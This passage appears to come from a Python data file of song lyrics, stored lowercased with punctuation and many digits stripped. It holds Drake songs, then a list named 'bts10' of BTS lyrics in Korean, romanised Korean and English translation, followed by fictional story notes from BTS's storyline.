griffith theme song and who told you to put them jeans on doublecup love you the one i lean on feeling for a fix then you should really get your fiend on yeah just know my condo is the crack spot every single show she out there repping like a mascot get it from the back and make your fucking bra strap pop all up in yo slot until the nigga hit the jackpots i'm saying pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever drake nicki minaj ugh aww yeah aww yeah see this the type of joint you gotta dedicate to somebody this is just make sure they that special somebody an essay young money baby yeah yeah 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i can tell ya how it happened i can tell ya 'bout them safe house nights out in calabasas i can tell you not a rapper tryna sell this story i don't even open up the package who you with what you claim i was payin' mama's rent when was i turning 7 soda dirty like diana never clean my ex asked me where you movin' i said on to better things 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i been in the crib with the phones off i been at the house taking no calls i done hit the stride got my shit goin' in the six cooking with the wrist motion drapes closed i don't know what time it is i'm still awake i gotta shine this year i could never ever let the streets down haven't left the condo for a week now 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i've been on a mission haven't left the condo this that ovo that szn this that new toronto i get boxes of free jordan like i play for north carolina how much i make off the deal how the fuck should i know all my watches always timeless you can keep the diamonds treatin' diamonds of atlanta like it's king of diamonds take a flick i look like meechy look like bleu davinci i treat v live like it's 07 in magic city man i told my city i'd be gone 'til november then november came then i came right back on my worst behav' 6 god put both hands together that's amazin' grace 6 god selfish with the love i need all the praise woo they got me feelin' like the one again woo they got me feelin' like the one again yeah shout goes out to nike checks all over me i need a fuelband just to see how long the run has been 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i been in the crib with the phones off i been at the house takin' no calls i done hit the stride got my shit going in the 6 cookin' with the wriwriwriwri pimp c man get the fuck away from us we don't want nothin' but money we some family\u2005men\u2005we gettin' this\u2005paper know what i'm talkin' 'bout and i\u2005had to put that out there bun because a lot of\u205fniggas\u205fdoin'\u205flot of fugazi\u205fshit out here\u205fman love me save me tell me try me all you do is lie to me takin' me for granted i could tell all you do is lie to me lies don't excite me i'm lonely need more than a homie takin' me for granted i could tell all you do is lie to me and dub me you never love me any confidence i came with you take it from me i just wanna get beside you and make you love me i just can not take the silence you keep ignorin' me see you makin' all this time for more important things we was s'posed to catch a vibe the other night busy now but you was down that other time why you always lead me on and give me signs i just wanna get beside and make you mine i just wanna come inside and reunite got me waitin' outside hah love me save me tell me try me all you do is lie to me takin' me for granted i could tell all you do is lie to me lies don't excite me i'm lonely need more than a homie takin' me for granted i could tell diddy uhm you was just so in your pocket uhm cats used to tell me when they used to come to my house in miami and shit that that that they felt a feelin' of like they felt a lil' fucked up in they stomach but they was inspired 'cause they knew they they they had somethin' to see the dream for you know i done seen a lot of shit i ain't never seen a a young nigga as consistent as you that has affected the world in such a positive way since you know michael jackson and then when you've finally got the crib all you do is lie to me you did it like not even none of us did it you feel me uhm nah i mean i did it like that i ain't gon' lie i ain't gon' lie to you i did it like that but i ain't never been affected by another nigga crib in the way that did it to inspire me how cats told me that he'd been inspired all you do is lie to me and felt that feelin' in they gut like i gotta work harder need more than a homie well i mean workin' harder just to compete bro for real for real it's either you fuckin' in the game or you're out the game nigga i'm back in this motherfucker let's get some money it's over nigga you have arrived top five end of discussion may god bless you inshallah you know what i'm sayin' this your brother diddy take that and thank you for the inspiration jheeze what if i kissed you right now how would we explain it trying to imagine how it might sound if i just yelled out what if i kissed you right now would it bring us any closer take the weight off our shoulders take me i'm yours and i don't really care who knows it can we afford to be that open with all these emotions if we were a secret how long could you keep it keep it to yourself don't tell nobody else something away away something away with you you and you just be mine just be mine and you just be mine all mine and you just be mine just just be mine and you just be mine all mine what if i kissed you right now would it bring us any closer take a weight off of our shoulders tell on me i dont mind cause if they ask me about it i won't lie admit that i'm yours i don't really care who knows it can we afford to be that open with all these emotions if we were a secret tell me could u keep it keep it your yourself don't tell nobody else something away away something away with you you and you just be mine just be mine and you just be mine all mine and you just be mine just just be mine and you just be mine all mine what if i kissed you right now what if i kissed you right now just be mine just be mine and u just be mine all mine and u just be mine just just be mine and u just be mine all mine hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right money there's no need to stash right money same four g's from last night money you cannot take that from me hey yo i'm movin' on up excuse a moi pardon it's me there's a new chapter to life that i'm starting to see and i'ma make and spend money to the hardest degree and on the low i probably mimic every artist i see i need a house a wifey a nice watch and a lot of cake i can't lie there's certain figures i gotta make and for my family this a shot that i gotta take cause where i live there's nobody as hot as drake which basically means who's faith in his team will resort to new cars briefcases with cream tryna find a space in the jeans for placing the green and a watch get they attention the bracelet's clean i'm stayin' the music wifey kinda need to be a band lover i keep it flow an old school like your grandmother i'm a tan brother they use rubber bands to keep his money intact if you don't like it you should ban rubber hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right money there's no need to stash right money same four g's from last night money you cannot take that from me these days i really can't break 0s hunnid and make money money every month the government will take money from me make 750 look how quicky i spent that don't call me broke cause i strictly resent that last my p had to flip my the rent because the tax bracket i'm in's is 50 percent flat all because of ebay givin' me leway basically do the paypal i need a raise now seems every time a nigga stop and he eat i end up always tryna shop and compete they know a nigga 'bout it when it's in his size and cops it in more colors than popsicle pete till i'm piled to the top with receipts trust the store and i don't understand less is more wanna get 'em to the point where they owe me and they gon' see drake's on his job it's like hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right there's no need to stash right same four g's from last night you cannot take that from me"]
bts10 = ["너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 47 하루 종일 니 생각만 했지 기대했던 첫 데이트 내게는 왠지 특별한 날이 될듯해 i can be a gentleman 'cause i'm your boyfriend 흠흠 고민 끝에 밤을 꼴딱 새워버렸지만 아침 해조차 깨지 않은 시간 하루가 왜 이렇게 긴 지 초침이 괜히 밉지 너랑 사귀게 된 뒤부터 매일 up된 feeling all night girl i think about you all night girl 내일이면 그댈 보게 돼 and i don't know what to say 너를 만나는 sunday 기다려왔던 sunday how we do how we do how we do uh yeah 시간아 조금만 빨리 달려줘 너를 만나는 sunday 상상만 했던 someday 오늘은 한숨도 못 잘 것 같아 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 내일은 꿈꾸던 데이트 날 참 예쁜 별과 예쁜 달 날 비추는 빛 오늘따라 더 모든 세상이 날 위한 것 같아 right 오늘 밤만큼은 plan man 널 위해서야 달링 만약 시간이 너란 주식이라면 투자를 하지 너와 입을 옷 choice 옷장을 포위 내 맘은 noise 흥에 나는 콧소리 니 생각만 가득했지 하루죙일 오늘 밤까지 니 환상에 잠 못 이루겠지 홀로 all night girl i think about you all night girl 내일이면 그댈 보게 돼 and i don't know what to say 너를 만나는 sunday 기다려왔던 sunday how we do how we do how we do uh yeah 시간아 조금만 빨리 달려줘 너를 만나는 sunday 상상만 했던 someday 오늘은 한숨도 못 잘 것 같아 자꾸 거울을 보고 괜히 심장이 뛰어 i don't wanna say no more feel like i don't wanna say no more i know oh 넌 i know 만들어 내 매일을 영화처럼 요즘엔 난 늘 sunday 하루하루 또 sunday how we do how we do how we do uh yeah 하루에 몇 번씩 절로 미소가 상상만 했던 someday 이제는 아냐 someday 괜히 난 웃고 있을 것만 같아 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday fall everything fall everything fall everything 흩어지네 fall everything fall everything fall everything 떨어지네 너 땜에 나 이렇게 망가져 그만할래 이제 너 안 가져 못하겠어 뭣 같아서 제발 핑계 같은 건 삼가줘 니가 나한테 이럼 안 돼 니가 한 모든 말은 안대 실을 가리고 날 찢어 날 찍어 나 미쳐 다 싫어 전부 가져가 난 니가 그냥 미워 pre but you're my everything you're my everything you're my everything you're my 제발 좀 꺼져 huh 미안해 i hate you 사랑해 i hate you 용서해 shit i need you girl 왜 혼자 사랑하고 혼자서만 이별해 i need you girl 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl 너무 차가워 i need you girl i need you girl i need you girl i need you girl with it goes round and round 나 왜 자꾸 돌아오지 i go down and down 이쯤 되면 내가 바보지 나 무슨 짓을 해봐도 어쩔 수가 없다고 분명 내 심장 내 마음 내 가슴인데 왜 말을 안 듣냐고 또 혼잣말하네 또 혼잣말하네 또 혼잣말하네 또 혼잣말하네 넌 아무 말 안 해 아 제발 내가 잘할게 하늘은 또 파랗게 하늘은 또 파랗게 pre 하늘이 파래서 햇살이 빛나서 내 눈물이 더 잘 보이나 봐 왜 나는 너인지 왜 하필 너인지 왜 너를 떠날 수가 없는지 i need you girl 왜 혼자 사랑하고 혼자서만 이별해 i need you girl 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl 너무 차가워 i need you girl i need you girl i need you girl i need you girl with girl 차라리 차라리 헤어지자고 해줘 girl 사랑이 사랑이 아니었다고 해줘 oh 내겐 그럴 용기가 없어 내게 마지막 선물을 줘 더는 돌아갈 수 없도록 ohoh i need you girl oh 왜 혼자 사랑하고 oh baby 혼자서만 이별해 i need you girl 왜 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl yeah 너무 차가워 i need you girl i need you girl i need you girl i need you girl yeah i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 난생 처음 방탄이란 이름으로 선 무대 삼년 전 첫무대의 마음을 다시 검문해 여전히 대구 촌놈 랩퍼와 다를게 없었지 but 아마추어란 단어 위에 프로란 단어를 덧 썼지 그토록 원하던 무대 랩을 하며 춤 출때 아직 살아 있음을 느껴 피곤하고 고된 출퇴근 따위는 견딜만해 내사람들이 지켜보니까 몸이 아파도 버틸만해 함성들이 밀려 오니까 데 전후의 차의점 아이돌과 랩퍼 사이 경계에 살아도 여전히 내 공책엔 라임이 차있어 대기실과 무대 사이에선 펜을 들고 를 써 이런 내가 니들 눈에는 뭐가 달라졌어 damn shit 난 여전해 내가 변했다고 what 가서 전해 변함없이 본질을 지켜 i'm still rappean 년전과 다름없이 랩하고 노래해 i'm out i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 솔직해 두려웠었어 큰 소린 쳐놨는데 날 증명한다는게 펜과 책만 알던 애가 이제 세상을 놀래킨다는게 i dunno 세상의 기대치와 너무 비대칭 할까봐 두려웠어 나를 믿어줬던 모든 사람들을 배신하게 될까봐 무건운 어께를 펴고 첫 무대에 올라 차나의 짧은 정적 숨을 골라 내가 지켜봤던 사람들이 이젠 날 지켜보고 있네 항상 올려봤던 tv속 그들이 지금은 내 밑에 uh 주마등처럼 스칠 틈도 없이 한번뿐인 연극은 시작 돼버렸지 번만에 증발한 내 년의 피땀 피터지는 마이크와의 기싸움 몇십초일 뿐이었지만 똑똑히 쏟아내 i'm fucking real 야임마 니 꿈은 뭐야 나는 랩스타가 되는 거야 can't you feel 그리고 내려온 순간 그 함성 yeah i could read your mind uh yeah i could read your mind 물음표 내신 미소만 말없이 멤버들은 그저 내 어깨를 두드렸줬어 꼭 엊그제같은데 스무 밤이 흘러가 버렸어 and let the haters hate on me 걔네가 늘상 해온 일 니네가 키보드 놀릴동안 난 내 꿈들을 채웠지 썬글라스 hairstyle 뭘 욕하는지 알아 어쨌든 스무살에 너보다 잘나가는 나야 i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 우리가 뛰었던 날 우리 같이 겪었던 날 년이란 시간 모두 하나가 됐던 마음 그렇게 흘린 피땀이 날 적시네 무대가 끝난 뒤 눈물이 번지네 매순간 마다 자신에게 다짐해 초심을 잃지 않게 한상 나답게 처음의 나에게 부끄럽지 않게 so we go we go we go 더 위로 위로 위로 all i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good nansaeng cheoeum bangtaniran ireumeuro seon mudae samnyeon jeon cheotmudaeui maeumeul dashi geomunhae yeojeonhi daegu chonnom raeppeowa dareulge eobseotji but amachueoran daneo wie peuroran daneoreul deot sseotji geutorok weonhadeon mudae raepeul hamyeo choom choolddae ajik sala isseumeul neuggyeo pigonhago godwin chooltwindae ddawineun gyeondilmanhae naesaramdeuli jikyeobonigga momi apado beotilmanhae hamseongdeuli millyeo onigga debwi jeonhooui chauijeom aidolgwa raeppeo sai gyeonggyeeh salado yeojeonhi nae gongcheken raimi chaisseo daegishilgwa mudae saieseon peneul deulgo gasareul sseo ireon naega nideul nooneneun myeoga dallajweosseo damn shit nan yeojeonhae naega byeonhaetdago what gaseo jeonhae byeonhameobshi bonjileul jikyeo i'm still rappean samnyeonjeongwa dareumeobshi raebhago noraehae i'm out i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good rap monster soljikhae duryeoweosseoseo keun sorin chweonwatneunde nal jeungmyeonghandaneun pengwa chaekman aldeon aega ije sesangeul nollaekindaneunge i dunno sesangui gidaechiwa neomu bidaeching halggabwa duryeoweosseo nareul mideojweodeon modeun saramdeuleul bashinhage dwilggabwa mugwonun eoggeoreul pyeogo cheot mudaee olla chanaui jjalbeun jeongjeok soomeul golla naega jikyeobwatdeon saramdeuli ijen nal jikyeobogo itne hangsang ollyeobwatdeon tvsok geudeuli jigeumeun nae miteh uh jumadeungcheoreom seuchil teumdo eobshi hanbeonbbunin yeongeukeun shijak dwaebeoryeotji sambeonmane jeungbalhan nae samnyeonui piddam piteoeun maikeuwaui gissaoom myeotshibchoil bboonieotjiman ddokddokhi ssodanae i'm fucking real yaimma ni ggumeun myeoya naneun raebseuteoga dwaneun geoya i can't you feel geurigo naeryeoon soogan geu hamsung yeah i could read your mind uh yeah i could read your mind mooleulpyo naeshin misoman maleobshi membeodeuleun geujeo nae eoggeoreul dudeuryeosseo ggok eotgeujegateunde seumu bami heulryeobeoryosseo and let the haters on me gyaenega neulsang haeohn il ninega kibodeu nolrildongan nan nae ggumdeuleul chaeweotji sungeullaseu hairstyle wae yokhaneunji ara eojjaetdeun seumusale neoboda jalnaganeun naya i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good uriga ddwieotdeon nal uri gachi gyeokeotdeon nal samnyeoniran shigan modu hanaga dwaetdeon maeum geureoge heulrin piddami nal jeokshine mudaega ggeutnan dwi noonmooli beone maesungan mada jashinege dajimhae choshimeul ilji anhge hansan nadamge cheoeumui naehge buggeureobji ahnge so we go we go we go deo wiro wiro wiro all i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good english translation i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good the very first stage named as bts remind the mind three years ago i had still i was a hick but i became a pro no more amateur when i'm on stage rapping and dancing which i wanted so badly i feel alive although it's hard and tough i can handle it cause you're supporting me i can stand the pain cause i can hear shouting my name i'm in a boundary between idol and rapper still my notes are full of rhymes i write down the lyrics between on and off stage do i look something different i used to be damn shit i am still who i am something changed go tell them nothing changed i'm still a rapper man i still rap and sing as years ago i'm out refrain i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good rap monster frankly i was afraid to prove the big mouth i've told how to surprise the world with something else i dunno maybe i'll let you down i was afraid of making my people down but i straighten my shoulders and make my debut the moment of silence get my breath back the people i've seen are now staring at me fancy tv stars are now below me uh it was a very fast time the only once play has started it just took minutes to show my years the fierce fought with mic though it's a few seconds i put everything in i'm fuckin' real hey you what do you dream mine is a rapstar can't you feel the shouts after the stage yeah i could read your mind uh yeah i could read your mind no more questions just smile my team just tapped my shoulder it seems like yesterday but already past 0 days and let the haters on me it's their job when you play with the keyboard i've made my career sunglasses hair style know why you insult me anyway on 0 years old i'm better than you refrain i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good remember the day we've been through years we were as one that extremely hard days make me wet after the stage drop the tears every single time swear not to forget the very first intention always like me live up to me so we go we go we go more up up up all i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good yeah yeah yeah run alternative mix 넌 내 하나뿐인 태양 세상에 딱 하나 널 향해 피었지만 난 자꾸 목말라 너무 늦었어 늦었어 너 없이 살 순 없어 가지가 말라도 더 힘껏 손을 뻗어 손 뻗어봤자 금세 깨버릴 꿈 꿈 꿈 미칠 듯 달려도 또 제자리일 뿐 뿐 뿐 그냥 날 태워줘 그래 더 밀쳐내줘 이건 사랑에 미친 멍청이의 뜀박질 pre 더 뛰게 해줘 나를 더 뛰게 해줘 두 발에 상처만 가득해도 니 얼굴만 보면 웃는 나니까 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 post run don't tell me bye bye run you make me cry cry run love is a lie lie don't tell me don't tell me don't tell me bye bye 다 끝난 거라는데 난 멈출 수가 없네 땀인지 눈물인지 나 더는 분간 못해 oh 내 발가벗은 사랑도 거친 태풍 바람도 나를 더 뛰게만 해 내 심장과 함께 pre 더 뛰게 해줘 나를 더 뛰게 해줘 두 발에 상처만 가득해도 니 얼굴만 보면 웃는 나니까 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 추억들이 마른 꽃잎처럼 산산이 부서져가 내 손 끝에서 내 발 밑에서 달려가는 네 등 뒤로 마치 나비를 쫓듯 꿈 속을 헤매듯 너의 흔적을 따라가 길을 알려줘 날 좀 멈춰줘 정지 날 숨쉬게 해줘 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 run don't tell me bye bye run you make me cry cry run love is a lie lie don't tell me don't tell me don't tell me bye bye if i ruled the world i'd do it all westside westside westside westside till i die gimme the real world man if i ruled the world i'd do it all westside westside westside if i ruled the world i'd have it all 남자라면 똑같겠지 pretty girls 완전히 없어지네 인종차별 european asian caucasian girls i have 'em 그리곤 불러 릭오웬스 앤드뮬뮈스터 알렉산더 왕 셰인 올리버 평생 만들게 해 김남준 컬렉션 옷 색깔은 까만색으로 이제야 좀 만족스러 music turn it up 지루해져 후비는 콧구녕 노랠 만들어 지구상 모든 사람들에게 부르게 해 노래 제목은 애구가 이쁜 여자들에게 파묻혀 tv를 봐 세상의 모든 여자들 날 위해 ready to die 남자들 너넨 술 가져와 그냥 없어져도 좋아 어쨌든 여긴 내 왕국이니까 if i ruled the world i'd do it all i'd do it all i said for the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 if i ruled the world 가끔 꿈을 꿔 내가 만약 세상을 지배한다면 일단 먼저 난 공인중개사를 찾아가 가족과 함께 살 집을 사고파 그래 그 다음은 내 장롱면허 잠에서 깨워줘야지 4륜구동 차를 구입하고 기름을 주입하고 이런 게 무리라도 무이자인 할부로 주식과 도박 그딴 건 안 하고파 세상을 지배했는데 왜 그리 꿈이 소박 하냐는 질문은 마 난 방탄 식구들과 그래도 여전히 i'm still 음악이고파 난 힙합계의 김정은이 되서 우리 음악 말곤 심의를 걸겠어 얼토당토 안 한 꿈이지만 it's my dream 놀리지 마 if i ruled the world i'd do it all i'd do it all i said for the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 oh girl 어디 oh god 여기 세상에 모든 여자들은 hope world 줄 섰지 모든 money 거뜬하게 써도 내 지갑이란 골대에 돈이 골인되지 또 겁 없이 무대 위를 걸어다니지 달리지 않아도 갈수록 쌓여가는 마일리지 이런 꿈들을 이젠 내게 곧 선물하겠어 방탄이란 이름 걸고 외쳐 if i ruled the world if i ruled the world i'd do it all i'd do it all i said for the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 trivia 承 love yeah yeah is this love yeah is this love yeah sometimes i know yeah sometimes i don't yeah 이 다음 음 뭐라고 쓸까 음 너무 많은 말이 날 돌지만 내 마음 같은 게 하나 없어 그냥 느껴져 해가 뜨고 나면 꼭 달이 뜨듯이 손톱이 자라듯 겨울이 오면 나무들이 한 올 한 올 옷을 벗듯이 넌 나의 기억을 추억으로 바꿀 사람 사람을 사랑으로 만들 사람 널 알기 전 내 심장은 온통 직선뿐이던 거야 난 그냥 사람 사람 사람 넌 나의 모든 모서릴 잠식 나를 사랑 사랑 사랑 으로 만들어 만들어 우린 사람 사람 사람 저 무수히 많은 직선들 속 내 사랑 사랑 사랑 그 위에 살짝 앉음 하트가 돼 post i live so i love i live so i love i live so i love i live so i love yeah live love live love live love live love i live so i love i live so i love i live so i love i live so i love yeah live love live love if it's love i will love you you make i to an o i to an o i to an o 너 땜에 알았어 왜 사람과 사랑이 비슷한 소리가 나는지 you make live to a love live to a love yeah 너 땜에 알았어 왜 사람이 사랑을 하며 살아가야 하는지 i와 u의 거린 멀지만 f jklmnopqrst 모든 글잘 건너 내가 네게 닿았지 봐 내와 네도 똑같은 소리가 나잖아 그렇다고 내가 넌 아니지만 너의 책장의 일부가 되고파 너의 소설에 난 참견하고파 연인으로 난 그냥 사람 사람 사람 넌 나의 모든 모서릴 잠식 나를 사랑 사랑 사랑 으로 만들어 만들어 우린 사람 사람 사람 저 무수히 많은 직선들 속 내 사랑 사랑 사랑 그 위에 살짝 앉음 하트가 돼 post i live so i love i live so i love i live so i love i live so i love yeah live love live love live love live love i live so i love i live so i love i live so i love i live so i love yeah live love live love if it's love i will love you 만약 내가 간다면 어떨까 내가 간다면 슬플까 넌 no 만약 내가 아니면 난 뭘까 결국 너도 날 떠날까 refrain 스치는 바람 바람 바람 만 아니길 바랄 뿐 흘러갈 사람 사람 사람 만 아니길 바랄 뿐 기분은 파랑 파랑 파랑 머릿속은 온통 blue 널 얼마나 마나 마나 yeah 얼마나 마나 마나 yeah 넌 나의 사람 사람 사람 yeah yeah yeah yeah 넌 나의 바람 바람 바람 yeah yeah yeah yeah 넌 나의 자랑 자랑 자랑 yeah yeah yeah yeah 넌 나의 사랑 나의 사랑 단 한 사랑 단 한 사랑 넌 나의 사람 사람 사람 yeah yeah yeah yeah 넌 나의 바람 바람 바람 yeah yeah yeah yeah 넌 나의 자랑 자랑 자랑 yeah yeah yeah yeah 넌 나의 사랑 나의 사랑 단 한 사랑 단 한 사랑 you know you are always meant to be destiny all before the same old night love seok 0 august year can anyone remember the moment they fall in love can anyone predict the moment their love will end what could be the reason that humans dont have the ability to recognize those moments and why was i given the power to return all of those things the car came to a sudden stop the headlights flash crashing bouncing falling i did nothing but stand defenseless in the face of all of those moments i heard no sound and felt no sensations it was summer but the wind seemed cold there was the sound of something tumbling along the street then there was the scent of flowers only then did a sense of reality come to me the bouquet of smeraldo flowers fell from my hand she was laying there in the middle of the street there was blood flowing in between the strands of her hair the dark red blood flowers along the street i thought if only i could turn back time seok july year 0 past the school doors the sound of cicadas prickled my ears the school yard was crowded with kids laughing and playing and competing in races it was the start of summer vacation and everyone was chattering i ducked my head and walked in between them i wanted to leave as quickly as i could hyung i lifted my head surprised by the sudden appearance of someones shoulder it was hoseok and they looked at me their smiles as wide and bright as ever and their eyes full of mischief today is the start of vacation are you still going to leave hoseok asked tugging at my a i muttered sure and a few more meaningless words then turned my head away what had happened that day was clearly an accident it wasnt intentional i hadnt imagined that and yoongi would be in the storage room at that time the principal suspected that i was covering for my dangsaengs i had to say something but in the end yoongi had gotten expelled nobody knew that i had been the complicit have a good vacation hyung ill call you maybe having interpreted my expression hoseok let his hand drop slightly and forced an even brighter greeting i couldnt answer this time either there was nothing i could say as i passed the school gate i thought of the first day i had come to this school we had all been punished for tardiness together we could laugh because of it i had ruined these moments yoongi 5 june year i wasn't aware of anything other than the sound of music playing in my head not how much i had drunk nor where i was nor what i had been doing i didnt know and it wasnt important when i went outside stumbling it was already night i swayed as i walked i bumped into pedestrians news kiosks walls i didnt care i just wanted to forget everything s voice was still ringing in my ears hyung my next memory was of running like crazy up the hospital steps the hospital hall had been strangely long and dark i passed people wearing hospital gowns my heart pounded everyones faces were too pale they had no expressions they all seemed like dead people the sound of my breathing was harsh inside my own head inside the slightly opened hospital room door was lying there i turned my head without realizing it i couldnt look at him at that moment i suddenly heard the sound of a piano of flames of a building crumbling down i clutched my head and sank down this is your fault if it wasnt for you it was my mothers voice no my voice no someones voice at those words i was toented by countless moments i wanted to believe it wasnt so but was lying there was lying in a hall full of corpse like patients passing by i was utterly unable to go inside i couldnt check for myself when i stood my legs threatened to give out i left with tears flowing it was funny i couldnt even remember the last time i had cried i went to cross the street but someone grabbed my a and i came to a halt who was it no i didnt care no matter who it was it was all the same dont come near me go away just leave me be i dont want to hurt you either i dont want to be hurt so please dont come any closer yoongi june year 9 i thoughtlessly ditched school but truthfully i didnt have anywhere to go it was hot i had no money and i had nothing to do it was namjoon who said we should go to the beach the younger kids seemed excited but i didnt particularly feel like it nor did i dislike the idea do we have money at my question namjoon made everyone shake out their pockets a few coins a few bills so we cant go the one who said we could just walk was probably taehyung namjoon made a face begging them to reconsider but the kids just chattered away laughing and pretending to roll around on the road before starting to walk i wasnt in the mood to talk back so i just fell behind it was midday so even the gingko trees couldnt provide shade and the cars kicked up dust as they passed us on the sidewalkless road lets go there it was taehyung this time too or was it hoseok i didnt care so i didnt look carefully but it would have been one of them i had been walking along with my head down kicking dirt when i almost collided with someone i lifted my head was standing there as if frozen in place the muscles in his face trembled as if had seen something terrifying he was staring at a sign that said flowering arboretum kilometers i didnt want to walk i heard s voice sweat dripped from s face he went pale as if he might collapse at any second what is it i had a strange feeling park i called but as i expected he didnt budge i lifted my head again and looked at the sign hey its so hot why would we go to an arboretum lets go to the beach i said as if dragging my feet i didnt know what kind of place the arboretum was but it didnt seem like we should go whatever the reason s expression was strange we dont even have money hoseok replied thats why were walking and taehyung added if we just walk to the train station we can probably make it then namjoons said instead well just starve at dinner and taehyung pretended to cry and seok hyung laughed only started to move again once it was decided that we would take the road toward the train station walking with his head down and his shoulders trembling seemed like a small child i looked up at the sign again the characters spelling flowering arboretum were gradually getting further away namjoon july year i rested my head against the bus window from the library to the gas station the scenery passed by the window almost frighteningly familiar since i took this route everyday would there come a day i could leave this scenery behind i felt that it was impossible to predict what tomorrow would bring nor to hope for anything there was a woman sitting in front of me her hair tied with a yellow rubber band her shoulders lifted and then dropped as if she was sighing then she rested her head against the window for around a month already we had studied at the same library and gotten on the bus at the same stop we hadnt spoken a word to each other but we looked at the same scenery and lived on the same time and sighed the same sighs the hair tie was still in my pants pocket the woman always got off the bus three stops before i did every time i saw her leave i wondered if she was going to distribute fliers what kind of time was she spending what kind of things was she enduring how strongly did she feel stifled at the thought that tomorrow might not come or that from the beginning there had never been such 